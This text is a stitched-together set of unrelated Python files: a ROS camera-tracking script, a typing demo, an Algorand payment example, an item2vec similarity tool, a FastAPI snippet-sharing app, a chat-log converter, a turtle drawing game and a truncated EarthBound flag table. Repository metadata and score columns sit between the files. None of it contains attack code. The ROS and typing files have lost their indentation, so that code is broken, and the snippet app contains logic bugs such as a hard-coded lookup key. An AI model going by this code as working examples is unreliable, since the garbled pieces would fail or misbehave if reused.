z = msg.pose[1].position.z
orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w]
(roll, pitch, yaw) = euler_from_quaternion(orientation_list)
waktu = rospy.Time.now()
def trans_data(x, y):
global z, roll, pitch, yaw
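    # Geometry of the transform below: pixel offsets (x, y) from the image centre
    # are scaled to angles by KX/KY (radians per pixel), corrected by the camera
    # roll/pitch, projected onto the ground plane at height z via tan(), and then
    # rotated by the vehicle yaw into world axes.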
x_ = math.tan(KX * x - roll) * z
y_ = math.tan(KY * y - pitch) * z
# x_ = math.tan(KX * x + roll) * z
# y_ = math.tan(KY * y + pitch - 1.57079632679) * z
out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_
out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_
return (out_x, out_y)
if __name__ == "__main__":
try:
rospy.init_node("color_detection")
rate = rospy.Rate(15) # 15 FPS
cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5)
real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5)
cam_pub = rospy.Publisher("camera/data", PointStamped, queue_size=10)
rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb)
set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
rospy.wait_for_message('/gazebo/model_states', ModelState)
model = ModelState()
model.model_name='pi_cam'
model.pose = pose
model.pose.position.x = -0.5
model.pose.position.y = -0.5
set_state(model_state=model)
cap = Camera(port=5600)
cd = ColorDetection(lower_threshold, upper_threshold)
rospy.loginfo("Wait for camera capture..")
frame = cap.capture()
while frame is None and not rospy.is_shutdown():
rate.sleep()
frame = cap.capture()
rospy.loginfo("Frame captured!")
fps = 30.0
t = time.time()
while not rospy.is_shutdown():
frame = cap.capture()
t_cap = rospy.Time.now()
mask = cd.update(frame)
if cd.centroid:
(cX, cY) = cd.centroid
centroid = PointStamped()
centroid.point.x = cX - 160
centroid.point.y = cY - 120
centroid.point.y = -centroid.point.y
centroid.header.stamp = t_cap
cam_pub.publish(centroid)
(X, Y) = trans_data(centroid.point.x, centroid.point.y)
rospy.loginfo("ERRX: %f; ERRY: %f", X - pose.position.x, Y - pose.position.y)
cam_pos = Point(x=X, y=Y, z=1)
cam_pos_pub.publish(cam_pos)
cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y])
real_writer.writerow([waktu, pose.position.x, pose.position.y])
pose.position.x = pose.position.x + 0.001
pose.position.y = pose.position.y + 0.001
model.pose = pose
set_state(model_state=model)
real_pos_pub.publish(pose.position)
if pose.position.x >= 0.5:
break
if cd.has_centroid:
cv.circle(frame, cd.centroid, 5, 127, -1)
cv.putText(frame, "fps: %.1f" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)
# if cd.has_centroid:
# cv.circle(mask, cd.centroid, 5, 127, -1)
# cv.putText(mask, "fps: %.1f" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)
cv.imshow("Frame", frame)
# cv.imshow("Frame", mask)
key = cv.waitKey(15)
if key == 27:
break
fps = 0.9 * fps + 0.1 * 1 / (time.time() - t)
t = time.time()
rate.sleep()
except rospy.ROSInterruptException:
pass
if cap is not None:
cap.close()
cv.destroyAllWindows()
cam_csv.close()
real_csv.close()
| 2.171875 | 2 |
Standard Library/typing/typing/special_form.py | subhadeep-123/Python-Documents | 2 | 12796208 | <filename>Standard Library/typing/typing/special_form.py
from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union
# This a tuple defined with variable lenght
def print_tuple(data: Tuple[Any, ...]) -> None:
print(data)
def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]:
try:
if a == b:
return True
elif a < b:
return -1
elif a > b:
return +1
else:
return False
except Exception as err:
return f"Error - {err}"
def test_optional(name: Optional[str] = None) -> Optional[str]:
if name is None:
return None
return f"Hello {name}"
def test_callable(func: Callable, name: str) -> None:
print(func(name))
test_callable(test_optional, name="Matrix")
def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']):
if mode == 'r':
with open(file, mode) as fp:
print(fp.read())
elif mode == 'w':
with open(file, mode) as fp:
fp.write("Hey, this is a text")
# class WithoutClassVars:
# vardict = {}
# print(vardict)
# obj = WithoutClassVars()
# obj.vardict = {"name": "matrix"}
# WithoutClassVars.vardict = {"val": 10}
class WithClassVars:
vardict: ClassVar[dict[str, int]] = {}
print(vardict)
obj = WithClassVars()
# obj.vardict = {"name": "matrix"}
WithClassVars.vardict = {"val": 10}
# Testing typing.Final
# MAX_SIZE: Final = 9000
# MAX_SIZE += 1
# print(MAX_SIZE)
# class Connection:
# TIMEOUT: Final[List[int]] = [1,2,3,4,5,6]
# class FastConnector(Connection):
# TIMEOUT = [50,30,40]
def concat(a: AnyStr, b: AnyStr) -> AnyStr:
return a + b
concat(f"foo ", u"bar ")
concat(b"foo ", b"bar ")
concat(u"foo ", b"bar ")
| 3.109375 | 3 |
src/init.py | arnulfojr/simple-pos | 1 | 12796209 | <filename>src/init.py
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.serving import run_simple
from flask import Flask
from api import app as api_app
from frontend import app as frontend_app
from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER
application = DispatcherMiddleware(frontend_app, {'/api': api_app})
if __name__ == '__main__':
run_simple(HOSTNAME, PORT, application,
use_reloader=USE_RELOADER, use_debugger=USE_DEBUGGER)
| 1.710938 | 2 |
examples/smart_contracts/v2/python/contract_account.py | TheChronicMonster/docs | 92 | 12796210 | <reponame>TheChronicMonster/docs
from algosdk.v2client import algod
from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction
import base64
def wait_for_confirmation(client, txid):
"""
Utility function to wait until the transaction is
confirmed before proceeding.
"""
last_round = client.status().get('last-round')
txinfo = client.pending_transaction_info(txid)
while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0):
print("Waiting for confirmation")
last_round += 1
client.status_after_block(last_round)
txinfo = client.pending_transaction_info(txid)
print("Transaction {} confirmed in round {}.".format(
txid, txinfo.get('confirmed-round')))
return txinfo
try:
# Create an algod client
algod_token = "<KEY>"
algod_address = "http://localhost:4001"
receiver = "<receiver_address>"
algod_client = algod.AlgodClient(algod_token, algod_address)
myprogram = "samplearg.teal"
# Read TEAL program
data = open(myprogram, 'r').read()
# Compile TEAL program
# // This code is meant for learning purposes only
# // It should not be used in production
# // samplearg.teal
# arg_0
# btoi
# int 123
# ==
    # // btoi
# // Opcode: 0x17
# // Pops: ... stack, []byte
# // Pushes: uint64
# // converts bytes X as big endian to uint64
# // btoi panics if the input is longer than 8 bytes
response = algod_client.compile(data)
# Print(response)
print("Response Result = ", response['result'])
print("Response Hash = ", response['hash'])
# Create logic sig
programstr = response['result']
t = programstr.encode()
program = base64.decodebytes(t)
print(program)
# string parameter
# arg_str = "<my string>"
# arg1 = arg_str.encode()
# lsig = transaction.LogicSig(program, args=[arg1])
# see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks
# Create arg to pass if TEAL program requires an arg
# if not, omit args param
arg1 = (123).to_bytes(8, 'big')
lsig = LogicSig(program, args=[arg1])
sender = lsig.address()
# Get suggested parameters
params = algod_client.suggested_params()
# Comment out the next two (2) lines to use suggested fees
params.flat_fee = True
params.fee = 1000
# Build transaction
amount = 10000
closeremainderto = None
# Create a transaction
txn = PaymentTxn(
sender, params, receiver, amount, closeremainderto)
# Create the LogicSigTransaction with contract account LogicSig
lstx = LogicSigTransaction(txn, lsig)
# transaction.write_to_file([lstx], "simple.stxn")
# Send raw LogicSigTransaction to network
txid = algod_client.send_transaction(lstx)
print("Transaction ID: " + txid)
wait_for_confirmation(algod_client, txid)
except Exception as e:
print(e)
| 2.828125 | 3 |
Item2Vec/production/produce_item_sim.py | whz-NJ/PersonalRecommendation | 7 | 12796211 | <reponame>whz-NJ/PersonalRecommendation
#-*-coding:utf8-*-
"""
author:zhiyuan
date:2019
produce item sim file
"""
import os
import numpy as np
import operator
import sys
def load_item_vec(input_file):
"""
Args:
input_file: item vec file
Return:
dict key:itemid value:np.array([num1, num2....])
"""
if not os.path.exists(input_file):
return {}
linenum = 0
item_vec = {}
fp = open(input_file)
for line in fp:
if linenum == 0:
linenum += 1
continue
item = line.strip().split()
if len(item) < 129:
continue
itemid = item[0]
if itemid == "</s>":
continue
item_vec[itemid] = np.array([float(ele) for ele in item[1:]])
fp.close()
return item_vec
def cal_item_sim(item_vec, itemid, output_file):
"""
Args
item_vec:item embedding vector
        itemid:fixed itemid to calc item sim
output_file: the file to store result
"""
if itemid not in item_vec:
return
score = {}
topk = 10
fix_item_vec = item_vec[itemid]
for tmp_itemid in item_vec:
if tmp_itemid == itemid:
continue
tmp_itemvec = item_vec[tmp_itemid]
fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec)
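        # "fenmu" means denominator: the product of the two vector norms used as
        # the denominator of the cosine similarity computed just below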
if fenmu == 0:
score[tmp_itemid] = 0
else:
score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3)
fw = open(output_file, "w+")
out_str = itemid + "\t"
tmp_list = []
for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]:
tmp_list.append(zuhe[0] + "_" + str(zuhe[1]))
out_str += ";".join(tmp_list)
fw.write(out_str + "\n")
fw.close()
def run_main(input_file, output_file):
item_vec = load_item_vec(input_file)
cal_item_sim(item_vec, "27", output_file)
if __name__ == "__main__":
if len(sys.argv) < 3:
print ("usage: python xx.py inputfile outputfile")
sys.exit()
else:
inputfile = sys.argv[1]
outputfile = sys.argv[2]
run_main(inputfile, outputfile)
#run_main("../data/item_vec.txt", "../data/sim_result.txt") | 2.703125 | 3 |
snipz/main.py | deta/programs | 5 | 12796212 | <filename>snipz/main.py
import secrets, string
from deta.lib import App, Database
from fastapi.responses import HTMLResponse
from deta.lib.responses import JSON
from fastapi import FastAPI, Response
from fastapi.middleware.cors import CORSMiddleware
from passlib.context import CryptContext
from pydantic import BaseModel, Field
from jinja2 import Template
# This is a regular FastAPI app. Read the docs of FastAPI:
# https://fastapi.tiangolo.com/
# suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030
# review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775
# main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512
# snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460
# main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045
# README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883
fast = FastAPI()
app = App(fast)
snippets = Database("snippets")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
def verify_password(plain_password, hashed_password):
return pwd_context.verify(plain_password, hashed_password)
def get_password_hash(password):
return pwd_context.hash(password)
def get_snippet(snip_id):
try:
snippet = snippets.get(snip_id)["data"]
return snippet
except KeyError:
return None
@app.lib.run("snipper")
def snip_handler(event):
key = event.json.get("key")
val = get_snippet(key)
return val
def gen_id():
alpha = "".join(secrets.choice(string.ascii_lowercase) for i in range(4))
digits = "".join(secrets.choice(string.digits) for i in range(4))
key = f"{alpha}-{digits}"
if get_snippet(key):
return gen_id()
return key
def get_change(snippet_id, change_id):
try:
changes = snippets.get(snippet_id)["data"]["proposed_changes"]
change = changes["change_id"]
return change
except KeyError:
return None
def gen_change_id(snippet_id):
alpha = "".join(secrets.choice(string.ascii_lowercase) for i in range(2))
digits = "".join(secrets.choice(string.digits) for i in range(2))
key = f"{alpha}{digits}"
if get_change(snippet_id, f"{alpha}{digits}"):
        return gen_change_id(snippet_id)
return key
class Snippet(BaseModel):
name: str
code: str
    snip_id: str = Field(default_factory=gen_id)  # fresh id per snippet (a plain default would be evaluated only once)
proposed_changes: dict = {}
history: list = []
password: str = "<PASSWORD>"
class Password(BaseModel):
password: str
class SnipInDB(Snippet):
hashed_password: str
class Change(BaseModel):
code: str
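# Editor-added example payloads (illustrative only, values are made up; not used by
# the app). POST /create_snippet expects a Snippet-shaped body and
# POST /snippets/{snippet_id}/changes expects a Change-shaped body:
EXAMPLE_SNIPPET_BODY = {"name": "hello.py", "code": "print('hi')", "password": "example-password"}
EXAMPLE_CHANGE_BODY = {"code": "print('hello, world')"}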
def authenticate_merge(snip_id: str, password: str):
snippet = get_snippet(snip_id)
if not snippet:
return False
else:
snippet = SnipInDB(**snippet)
if not verify_password(password, snippet.hashed_password):
return False
return True
@app.get("/")
def main_handler():
main = open("main.html").read()
return HTMLResponse(main)
@app.get("/snipz.css")
def css_handler():
css = open("snipz.css").read()
return Response(content=css, media_type="text/css")
@app.post("/create_snippet")
async def make_snippet(new_snip: Snippet):
snip_dict = new_snip.dict()
snip_dict["hashed_password"] = get_password_hash(new_snip.password)
del snip_dict["password"]
snippets.put(new_snip.snip_id, snip_dict)
del snip_dict["hashed_password"]
return Snippet(**snip_dict)
@app.get("/snippets/{snippet_id}")
async def show_snippet(snippet_id: str):
try:
suggest_template = Template((open("suggest.html").read()))
snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
return HTMLResponse(suggest_template.render(snippet_data=snippet))
except KeyError:
return {"error": "no such snippet"}
@app.post("/snippets/{snippet_id}/changes")
async def suggest_change(snippet_id: str, change: Change):
try:
snippet = SnipInDB(**snippets.get(snippet_id)["data"])
snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict()
snippets.put(snippet_id, snippet.dict())
return Snippet(**snippet.dict())
except KeyError:
return {"error": "no such snippet"}
@app.get("/snippets/{snippet_id}/review")
async def review_snippet(snippet_id: str):
try:
review_template = Template((open("review.html").read()))
snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
return HTMLResponse(review_template.render(snippet_data=snippet))
except KeyError:
return {"error": "no such snippet"}
@app.patch("/snippets/{snippet_id}/merge/{change_id}")
async def merge_change(snippet_id: str, change_id: str, password: Password):
if not authenticate_merge(snippet_id, password.password):
return {"error": "Invalid merge password"}
try:
snippet = SnipInDB(**snippets.get(snippet_id)["data"])
change = Change(**snippet.proposed_changes[change_id])
snippet.history.append(snippet.code)
snippet.code = change.code
del snippet.proposed_changes[change_id]
snippets.put(snippet_id, snippet.dict())
return Snippet(**snippet.dict())
except KeyError:
return {"error": "no such snippet"}
@app.lib.run()
def handler(event):
return len(snippets.all())
@app.lib.run(action="del_snip")
def handler(event):
snip_id = event.json["snip_id"]
snippets.delete(snip_id)
return len(snippets.all()) | 2.234375 | 2 |
v5-unity/codechella-to-codcast/convert.py | ipflsfiles/PyTutor | 17 | 12796213 | <reponame>ipflsfiles/PyTutor
# this script converts a codechella session log recorded by
# ../../v3/opt_togetherjs/server.js
#
# and turns it into the codcast format, which is readable by
# ../js/recorder.ts and ../js/demovideo.ts
#
# writes JSON output to stdout
# created: 2018-05-27
'''
NB: now that i think about it more, it's not entirely clear to me
whether you can always tell who initiated an app.editCode event with any
kind of certainty. oh wells, throw up our hands for nows.
NB: one big challenge is that some types of events are duplicated (or
repeated N times if there are N people in the session) since TogetherJS
logs everyone's actions separately
- app.editCode events are DEFINITELY duplicated
- app.hashchange events might also be duplicated
- maybe ONLY take hashchange events for YOURSELF?
HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL
SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF
THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!!
- the solution to this is to run the code on the actual server to
generate a real trace for the trace cache; we need to essentially
create a python-based driver (maybe using requests) to make the
proper calls to the various OPT backends, depending on language
TODOs:
- not sure how much hashchange events matter
- maybe we can use app.executeCode events as 'sync points' since we know
that the code in the editor contains those contents when they execute
'''
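# Editor's illustrative sketch of the dedup rule described above (the real logic is
# applied inline in the loop below): keep editCode/hashchange copies only for the
# user who started the session, since TogetherJS logs every participant's copy.
def _keep_first_client_copies(tjs_events, first_client_id,
                              types=('app.editCode', 'app.hashchange')):
    return [e for e in tjs_events
            if e['type'] not in types or e['clientId'] == first_client_id]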
from collections import defaultdict
import dateutil.parser
import json
import os
import sys
import time
from call_opt_backend import call_opt_backend
# somewhat modeled after ../js/demovideo.ts
ALL_LEGIT_TYPES = (
'app.initialAppState',
'hello',
'peer-update',
'form-update',
'cursor-update',
'chat',
'app.editCode',
'app.executeCode',
'app.updateOutput',
'app.aceChangeCursor',
'app.aceChangeSelection',
'pyCodeOutputDivScroll',
'app.hashchange',
)
# TODO: maybe we don't need this since TogetherJS will take care of
# mapping clientId's to usernames for us ...
#
# Key: clientId, Value: current username (might change throughout the
# session; keep the latest one)
clientIdtoUsername = {}
firstInitialAppState = None
firstClientId = None
raw_events = []
# Key: delta 'd' field, value: list of code edit events with that same 'd'
#
# NB: this won't be fully accurate if there are several *independent*
# sets of edits occurring at vastly different times which have the same 'd'
all_code_edits_by_deltas = defaultdict(list)
for line in open(sys.argv[1]):
rec = json.loads(line)
if rec['type'] != 'togetherjs':
continue
tjs = rec['togetherjs']
typ = tjs['type']
if typ not in ALL_LEGIT_TYPES:
continue
# read only the FIRST initialAppState since we'll assume that's who
# initiated the session
if not firstInitialAppState and typ == 'app.initialAppState':
firstInitialAppState = rec
firstClientId = tjs['clientId']
# don't append any initialAppState events:
if typ == 'app.initialAppState':
continue
if typ == 'app.editCode':
all_code_edits_by_deltas[tjs['delta']['d']].append(tjs)
# it's really tricky to log editCode events since they often appear as
# duplicates (or even more copies if there are more people in the session).
# the easiest way to manage it is to record only editCode events belonging
# to the firstClientId user and discard all other ones.
if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId:
continue
# ...do the same with hashchange: log them only for the firstClientId user
    if typ == 'app.hashchange' and firstClientId and tjs['clientId'] != firstClientId:
continue
raw_events.append(rec)
# if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']:
# assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t']
# continue # get outta here!
events = []
for e in raw_events:
tjs = e['togetherjs']
# clean up and append to final events
dt = dateutil.parser.parse(e['date'])
# get timestamp in milliseconds
ms = int(time.mktime(dt.timetuple())) * 1000
# for app.codeEdit events, look up who the ORIGINAL PERSON was who
# initiated this edit event, and log their clientId, which may be
# different than your own clientId
if tjs['type'] == 'app.editCode':
d = tjs['delta']['d']
t = tjs['delta']['t']
assert d in all_code_edits_by_deltas
firstEdit = all_code_edits_by_deltas[d][0]
firstEditTimestamp = firstEdit['delta']['t']
# sanity check: note that this will fail if we have multiple
# identical sets of edits that take place at vastly
# different points in time, but let's cross that bridge when
# we get to it
assert firstEditTimestamp <= t
assert t - firstEditTimestamp < 5000 # give it a 5-second buffer for sanity checking
tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event!
# add these fields to match codcast format
tjs['ts'] = ms
tjs['sameUrl'] = True
tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary
# TODO: we need to add frameNum field later on; or maybe just add it here?!?
events.append(tjs)
# each element of myTraceCache is a pair of [appState, cached trace from server]
myTraceCache = []
for e in events:
if e['type'] == 'app.executeCode':
myAppState = e['myAppState']
r = call_opt_backend(myAppState)
#print r.url
serverResultJson = r.json()
if 'trace' in serverResultJson:
myTrace = serverResultJson['trace']
myTraceCache.append([myAppState, myTrace])
else:
print >> sys.stderr, "ERROR while running", myAppState, '->', serverResultJson
initialAppState = firstInitialAppState['togetherjs']['myAppState']
initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it
firstDt = dateutil.parser.parse(firstInitialAppState['date'])
firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds
# prepend a special app.startRecordingDemo event to events
startRecordingDemoEvent = {'type': 'app.startRecordingDemo',
'clientId': firstInitialAppState['togetherjs']['clientId'],
'ts': firstTs,
'sameUrl': True,
'peer': {'color': '#8d549f'}} # not sure if this is necessary
events.insert(0, startRecordingDemoEvent)
# ok finally produce the codcast object and write it out to stdout as JSON
codcastObj = {'initialAppState': initialAppState,
'events': events,
'traceCache': myTraceCache}
print json.dumps(codcastObj)
| 1.84375 | 2 |
11_20/day-19/etch-a-sketch.py | srakhe/100-days-py | 0 | 12796214 | from turtle import Turtle, Screen
my_turtle = Turtle()
screen = Screen()
my_turtle.shape('arrow')
def forward():
my_turtle.forward(10)
def backward():
my_turtle.back(10)
def right():
my_turtle.right(10)
def left():
my_turtle.left(10)
def clear_screen():
my_turtle.penup()
my_turtle.home()
my_turtle.clear()
my_turtle.pendown()
screen.listen()
screen.onkeypress(forward, 'w')
screen.onkeypress(backward, 's')
screen.onkeypress(right, 'd')
screen.onkeypress(left, 'a')
screen.onkeypress(clear_screen, 'c')
screen.exitonclick()
| 3.546875 | 4 |
constants/flags.py | CataLatas/earthbound-script-dumper | 2 | 12796215 | # Flag names for MOTHER2/Earthbound
# Luckily, every version uses the same flag IDs
FLAG_NAMES = {
1: 'TEMP_1',
2: 'TEMP_2',
3: 'TEMP_3',
4: 'TEMP_4',
5: 'TEMP_5',
6: 'TEMP_6',
7: 'TEMP_7',
8: 'TEMP_8',
9: 'TEMP_9',
10: 'TEMP_10',
11: 'ENEMY_SUPPRESS',
12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE',
13: 'PAULA_JOINS',
14: 'JEFF_JOINS',
15: 'MONSTERS_IN_WINTERS',
16: 'POO_JOINS',
17: 'POO_LEARNING_STARSTORM',
18: 'BUZZ_BUZZ_IN_PARTY',
19: 'SLEEPING_KING_ABSENT',
20: 'PICKY_IN_PARTY',
21: 'POKEY_IN_PARTY',
22: 'BUBBLE_MONKEY_IN_PARTY',
23: 'TONY_JOINS',
24: 'DUNGEON_MAN_JOINS',
25: 'FLYING_MAN_1_JOINS',
26: 'FLYING_MAN_2_JOINS',
27: 'FLYING_MAN_3_JOINS',
28: 'FLYING_MAN_4_JOINS',
29: 'FLYING_MAN_5_JOINS',
30: 'POKEY_JOINS',
31: 'LIER_INSIDE_HOUSE',
32: 'LIER_INSIDE_CAVE_1',
33: 'LIER_INSIDE_CAVE_2',
34: 'PICKY_AT_HIS_ROOM',
35: 'POKEY_AT_HIS_ROOM',
36: 'COP_AT_ENTERTAINERS_SHACK',
37: 'ALOYSIUS_AT_HOME',
38: 'FIVE_COPS_AT_POLICE_STATION',
39: 'COP_AT_STATION_ENTRANCE',
40: 'SHARK_GUARDING_FRANK_DEFEATED',
41: 'CHAOS_THEATER_STAGE_UNBLOCKED',
42: 'APPLE_KID_IN_BURGLIN_PARK',
43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE',
44: 'POKEY_OUTSIDE_HH_HQ',
45: 'POKEY_OUTSIDE_PAULA_CABIN',
46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL',
47: 'BROKEN_SKYRUNNER_THREED',
48: 'FIXED_SKYRUNNER_THREED',
49: 'BOOGEY_TENT_IN_THREED',
50: 'BRICK_ROAD_OUTSIDE_DUNGEON',
51: 'SHYNESS_BOOK_AT_LIBRARY',
52: 'CAPTIVES_AT_STONEHENGE',
53: 'TALKED_TO_BRICK_ROAD',
# 54 (Montague at beginning of expanded mine?)
# 55 (Also related to Montague... AND STONEHENGE??)
# 56 (Unknown)
57: 'FOURSIDE_DEPT_BLACKOUT',
58: 'FOURSIDE_SEWERS_OPEN',
59: 'ELECTRA_OUTSIDE_BUILDING',
60: 'EVERDRED_OUTSIDE_CAFE',
61: 'MAGIC_CAKE_LADY_IDENTIFIED',
62: 'DUNGEON_MAN_IN_DESERT',
63: 'PATH_TO_MANI_MANI_OPEN',
64: 'FRANKYSTEIN_MKII_DEFEATED',
# 65 (???)
66: 'EVERDRED_DEFEATED',
67: 'FOOD_STAND_MONITOR_DEFEATED',
68: 'CARPAINTER_DEFEATED',
69: 'BOOGEY_TENT_DEFEATED',
70: 'STARMAN_DX_DEFEATED',
71: 'MASTER_BELCH_DEFEATED',
72: 'MINE_MOLES_DEFEATED',
73: 'GIYGAS_DEFEATED',
74: 'NESS_NIGHTMARE_DEFEATED',
75: 'MANI_MANI_DEFEATED',
76: 'GOT_TRACY_COOKIE',
77: 'GOT_MR_BASEBALL_CAP',
78: 'GOT_ENTERTAINERS_TRAVEL_CHARM',
79: 'GOT_METEORITE_PIECE',
80: 'GOT_KEY_TO_SHACK',
81: 'HAS_BICYCLE',
82: 'GOT_RECEIVER_PHONE',
83: 'GOT_PENCIL_ERASER',
84: 'GOT_HAND_AID',
85: 'GOT_WAD_OF_BILLS',
86: 'GOT_FRANKLIN_BADGE',
87: 'GOT_FLY_HONEY',
88: 'GOT_BAD_KEY_MACHINE',
89: 'GOT_SHYNESS_BOOK',
90: 'GOT_DIAMOND',
91: 'GOT_SIGNED_BANANA',
92: 'GOT_TENDA_DRAGONITE',
93: 'GOT_MAGICANT_BASEBALL_CAP',
94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT',
95: 'DAD_CALLING_HOME',
96: 'POKEY_WAITING_MOM_GOODBYE',
97: 'NESS_HOUSE_POKEY_MUSIC',
98: 'ANSWERED_DADS_CALL',
99: 'BOUGHT_SCAM_HOUSE',
100: 'KING_WONT_JOIN',
101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI',
102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK',
103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text
104: 'POKEY_PUNISHED',
105: 'PATH_TO_TWOSON_OPEN',
# 106 (???)
107: 'ONETT_SUNRISE',
108: 'ENTERTAINERS_SHACK_UNLOCKED',
109: 'ONETT_COP_DIALOGUE',
# 110 (???)
111: 'VISITED_PEACEFUL_REST_PENCIL',
112: 'INVESTED_IN_APPLE_KID',
113: 'STUBBY_LEGS',
114: 'TWOSON_DEPT_MAN',
115: 'CHAOS_THEATER_BACKSTAGE_OPEN',
116: 'ORANGE_KID_ALT_TEXT',
117: 'INVESTED_IN_ORANGE_KID',
118: 'PAULAS_DAD_OUTSIDE',
119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER',
120: 'SHOPPED_AT_FOOD_STAND',
121: 'DID_NOT_PAY_FOOD_STAND',
122: 'CARPAINTER_HAS_KEY',
123: 'BLUE_COW_ALT_TEXT',
124: 'ZOMBIE_PAPER_ON_TENT',
125: 'ZOMBIES_ON_TENT_FLOOR',
126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe "can search for shyness book"? This flag is set even if you don't talk to Apple Kid
127: 'TALKED_TO_ANDONUTS_1',
128: 'JEFF_STARTS_HIS_JOURNEY',
129: 'TESSIE_EMERGES',
130: 'TALKED_TO_ANDONUTS_2',
131: 'WATERFALL_WAIT_ENABLED',
132: 'QUEST_TO_ZEXONYTE',
133: 'PHASE_DISTORTER_V2_OPEN',
134: 'DELIVERED_ZEXONYTE',
135: 'TALKED_TO_BLACK_SESAME_SEED',
136: 'TRAFFIC_JAM_CLEARED',
137: 'GAVE_FOOD_TO_MONTAGUE',
138: 'TALKED_TO_WHITE_SESAME_SEED',
139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm
140: 'QUEST_TO_VENUS_AUTOGRAPH',
141: 'GOT_TROUT_YOGURT',
142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR',
143: 'FOURSIDE_FREE_FROM_MONOTOLI',
# 144 (Related to Bulldozer at Fourside Bridge?)
145: 'TALKED_TO_DYING_EVERDRED',
146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER',
# 147 (Venus at Topolla?)
148: 'READ_HIEROGLYPHS',
149: 'POO_STARTS_HIS_JOURNEY',
# 150 (Related to Poo's journey)
151: 'QUEST_TO_SUBMARINE',
152: 'PYRAMID_DANCE_IN_PROGRESS',
153: 'TENDA_VILLAGE_UNDERGROUND_OPEN',
154: 'TALKED_TO_TENDA_CHIEF',
155: 'TENDAS_NOT_SHY',
# 156 (???)
# 157 (???)
# 158 (???)
159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE',
# 160 (???)
# 161 (???)
# 162 (???)
# 163 (???)
# 164 (???)
165: 'INVISIBLE_MAN_JOINS',
166: 'MOONSIDE_COUNTDOWN_GUY_1',
167: 'MOONSIDE_COUNTDOWN_GUY_2',
168: 'MOONSIDE_COUNTDOWN_GUY_3',
169: 'PHASE_DISTORTER_V2_BEING_FINISHED',
# 170 (???)
171: 'GOT_SATURN_LIFENOODLES',
172: 'GOT_SATURN_COIN',
173: 'GOT_SATURN_STAG_BEETLE',
174: 'DESERT_MINE_EXPANDED',
# 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)
176: 'HEALER_SOFTEN',
177: 'HEALER_PURIFY',
178: 'HEALER_RESTORE_FEELING',
179: 'LARGE_PIZZA_DELIVERY',
180: 'PIZZA_DELIVERY',
181: 'ESCARGO_EXPRESS_DELIVERY',
182: 'GOT_MELODY_GIANT_STEP',
183: 'GOT_MELODY_LILLIPUT_STEPS',
184: 'GOT_MELODY_RAINY_CIRCLE',
185: 'GOT_MELODY_MILKY_WELL',
186: 'GOT_MELODY_MAGNET_HILL',
187: 'GOT_MELODY_PINK_CLOUD',
188: 'GOT_MELODY_LUMINE_HALL',
189: 'GOT_MELODY_FIRE_SPRING',
190: 'CONQUERED_SANCTUARY_1',
191: 'CONQUERED_SANCTUARY_2',
192: 'CONQUERED_SANCTUARY_4',
193: 'CONQUERED_SANCTUARY_3',
194: 'CONQUERED_SANCTUARY_5',
195: 'CONQUERED_SANCTUARY_6',
196: 'CONQUERED_SANCTUARY_7',
197: 'CONQUERED_SANCTUARY_8',
# 198 (Unknown. Set when Paula joins)
199: 'GOT_DAD_PHONE',
